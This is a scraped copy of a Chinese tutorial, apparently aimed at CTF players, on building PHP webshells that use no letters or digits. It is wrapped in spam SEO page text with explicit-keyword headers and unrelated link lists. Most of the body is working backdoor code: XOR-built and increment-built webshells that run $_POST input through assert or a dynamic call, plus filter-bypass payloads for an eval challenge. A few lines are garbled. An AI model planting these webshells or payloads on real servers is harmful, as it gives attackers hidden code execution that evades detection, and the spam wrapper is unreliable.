中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

給網(wǎng)站做游戲視頻怎么賺錢關(guān)鍵詞搜索引擎又稱為

給網(wǎng)站做游戲視頻怎么賺錢,關(guān)鍵詞搜索引擎又稱為,云主機重裝系統(tǒng)后網(wǎng)站重新部署嗎,做網(wǎng)站的空間要多大的構(gòu)造不包含字母和數(shù)字的webshell <?php echo "A"^""; ?> 輸出的結(jié)果是字符"!“。之所以會得到這樣的結(jié)果&#xff0c;是因為代碼中對字符"A"和字符”"進行了異或操作。在PHP中&#xff0c;兩個變量進行異或時&#xff0c;…

構(gòu)造不包含字母和數(shù)字的webshell

<?php
? ? echo "A"^"`";
?>

輸出的結(jié)果是字符"!“。之所以會得到這樣的結(jié)果,是因為代碼中對字符"A"和字符”`"進行了異或操作。在PHP中,兩個變量進行異或時,先會將字符串轉(zhuǎn)換成ASCII值,再將ASCII值轉(zhuǎn)換成二進制再進行異或,異或完,又將結(jié)果從二進制轉(zhuǎn)換成了ASCII值,再將ASCII值轉(zhuǎn)換成字符串。異或操作有時也被用來交換兩個變量的值

什么是異或操作?

在php中,異或操作是兩個二進制數(shù)相同時,異或為0,不同為1

比如像上面這個例子

A的ASCII值是65,對應(yīng)的二進制值是0100 0001

`的ASCII值是96,對應(yīng)的二進制值是0110 0000

異或的二進制的值是00100001,對應(yīng)的ASCII值是33,對應(yīng)的字符串的值就是!了

我們都知道,PHP是弱類型的語言,也就是說在PHP中我們可以不預(yù)先聲明變量的類型,而直接聲明一個變量并進行初始化或賦值操作。正是由于PHP弱類型的這個特點,我們對PHP的變類型進行隱式的轉(zhuǎn)換,并利用這個特點進行一些非常規(guī)的操作。如將整型轉(zhuǎn)換成字符串型,將布爾型當(dāng)作整型,或者將字符串當(dāng)作函數(shù)來處理

<?php
? ? function B(){
? ? ? ? echo "Hello Angel_Kitty";
? ? }
? ? $_++;
? ? $__= "?" ^ "}";
? ? $__();
?>

這段代碼的執(zhí)行結(jié)果為:Hello Angel_Kitty

$++;這行代碼的意思是對變量名為""的變量進行自增操作,在PHP中未定義的變量默認(rèn)值為null,null==false==0,我們可以在不使用任何數(shù)字的情況下,通過對未定義變量的自增操作來得到一個數(shù)字。

我們希望使用這種后門創(chuàng)建一些可以繞過檢測的并且對我們有用的字符串,如_POST", “system”, “call_user_func_array”,或者是任何我們需要的東西

<?php
? ? @$_++; // $_ = 1
? ? $__=("#"^"|"); // $__ = _
? ? $__.=("."^"~"); // _P
? ? $__.=("/"^"`"); // _PO
? ? $__.=("|"^"/"); // _POS
? ? $__.=("{"^"/"); // _POST?
? ? ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

這是一個非常簡單的非數(shù)字字母的PHP后門

異或進行繞過

<?php
include 'flag.php';
if(isset($_GET['code'])){
? ? $code = $_GET['code'];
? ? if(strlen($code)>40){
? ? ? ? die("Long.");
? ? }
? ? if(preg_match("/[A-Za-z0-9]+/",$code)){
? ? ? ? die("NO.");
? ? }
? ? @eval($code);
}else{
? ? highlight_file(__FILE__);
}
//$hint = ?"php function getFlag() to get flag";
?>

直接給出payload:

?code=$_="`{{{"^"?<>/";${$_}[_]();&_=getFlag
$_GET[_]();&

<?php
? ? echo "`{{{"^"?<>/";//_GET
?>

取反進行繞過

<?php
$a = "getFlag";
echo urlencode(~$a);
?>

payload:

?code=$_=~%98%9A%8B%B9%93%9E%98;$_();

利用php語法進行繞過

? ?在處理字符變量的算數(shù)運算時,PHP 沿襲了 Perl 的習(xí)慣,而非 C 的。例如,在 Perl 中 $a = ‘Z’; $a++; 將把 $a 變成’AA’,而在 C 中,a = ‘Z’; a++; 將把 a 變成 ‘[’(‘Z’ 的 ASCII 值是 90,‘[’ 的 ASCII 值是 91)。注意字符變量只能遞增,不能遞減,并且只支持純字母(a-z 和 A-Z)。遞增/遞減其他字符變量則無效,原字符串沒有變化。也就是說,‘a(chǎn)’++ => ‘b’,‘b’++ => ‘c’… 所以,我們只要能拿到一個變量,其值為a,通過自增操作即可獲得a-z中所有字符。

那么,如何拿到一個值為字符串’a’的變量呢?

數(shù)組(Array)的第一個字母就是大寫A,而且第4個字母是小寫a。也就是說,我們可以同時拿到小寫和大寫A,等于我們就可以拿到a-z和A-Z的所有字母。

在PHP中,如果強制連接數(shù)組和字符串的話,數(shù)組將被轉(zhuǎn)換成字符串,其值為Array

再取這個字符串的第一個字母,就可以獲得’A’了。

利用這個技巧,編寫了如下webshell:

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E?
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
ASSERT
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

payload:

?code=$啊="@@^|@@@"^"'%*:,!'";$啊();

http://www.risenshineclean.com/news/53329.html

相關(guān)文章:

  • 俄羅斯外貿(mào)網(wǎng)站如何快速推廣網(wǎng)站
  • 網(wǎng)站前置審批 公司名稱百度站內(nèi)搜索代碼
  • 網(wǎng)站建設(shè)策劃書(建設(shè)前的市場分析)關(guān)鍵詞排名軟件
  • 怎么自己在微信上做網(wǎng)站全球搜索引擎市場份額
  • 撫順網(wǎng)站制作站長工具果凍傳媒
  • 什么網(wǎng)站做蔬菜生鮮比較好手機優(yōu)化大師下載2022
  • 網(wǎng)站建設(shè)用英語怎么說web網(wǎng)頁制作教程
  • 公司做網(wǎng)站有什么用搜索引擎優(yōu)化策略有哪些
  • 阿里虛擬主機怎么做兩個網(wǎng)站嗎營銷推廣投放平臺
  • 國內(nèi)免費可商用圖片素材網(wǎng)站鄭州seo管理
  • 公司網(wǎng)站設(shè)計很好的網(wǎng)絡(luò)營銷模式案例
  • 富陽做網(wǎng)站網(wǎng)店運營推廣方案
  • 中小型企業(yè)建設(shè)網(wǎng)站微信seo排名優(yōu)化軟件
  • 網(wǎng)站建設(shè)合作伙伴sem和seo是什么職業(yè)
  • 建站之星授權(quán)什么是論壇推廣
  • 正規(guī)專業(yè)的互聯(lián)網(wǎng)代做畢業(yè)設(shè)計網(wǎng)站博客seo優(yōu)化技術(shù)
  • 龍崗個性化網(wǎng)站建設(shè)價格低南寧網(wǎng)站運營優(yōu)化平臺
  • 公關(guān)做的好的網(wǎng)站平臺軟件定制開發(fā)
  • 河北特定網(wǎng)站建設(shè)推薦查詢網(wǎng)域名查詢
  • 黃埔區(qū)做網(wǎng)站工具站seo
  • 網(wǎng)站制作推薦廊坊關(guān)鍵詞排名優(yōu)化
  • 佛山高端網(wǎng)站建設(shè)google搜索引擎入口下載
  • 服務(wù)好質(zhì)量好的app開發(fā)seo網(wǎng)站優(yōu)化工具大全
  • 響站怎么建設(shè)網(wǎng)站營業(yè)推廣是什么
  • 國企500強完整名單上海單個關(guān)鍵詞優(yōu)化
  • 有沒有網(wǎng)站免費的網(wǎng)絡(luò)營銷策劃書格式
  • 海寧網(wǎng)站建設(shè)上海seo推廣整站
  • 有關(guān)大數(shù)據(jù)的網(wǎng)站及網(wǎng)址seminar
  • 進入福建省建設(shè)干部培訓(xùn)中心網(wǎng)站大數(shù)據(jù)營銷的案例
  • 如何用源代碼做網(wǎng)站手機優(yōu)化什么意思